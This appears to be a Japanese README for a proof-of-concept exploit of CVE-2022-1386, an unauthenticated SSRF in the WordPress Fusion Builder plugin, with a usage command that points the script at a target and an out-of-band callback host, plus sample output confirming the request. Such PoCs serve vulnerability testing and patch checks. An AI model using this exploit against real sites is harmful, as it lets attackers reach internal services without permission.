
WordPress Fusion Builder <3.6.2 における未認証のSSRF PoC (CVE-2022-1386)
Fusion Builderプラグイン(Avada WordPressテーマで使用)のバージョン3.6.2未満における、未認証のサーバーサイドリクエストフォージェリ(SSRF)です。
攻撃者は任意のURLにHTTPリクエストを送信でき、内部サービスを標的にする可能性があります。
admin-ajax.phpへの未認証のHTTP POSTpython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
例:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
Interact.shまたは[Burp Collaborator]を使用してコールバックを受信します。
📋 出力例
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 注意事項
このPoCはデータの外部漏洩を回避します。 倫理的な使用のみ:許可なくシステムを悪用しないでください。
📚 参考
https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/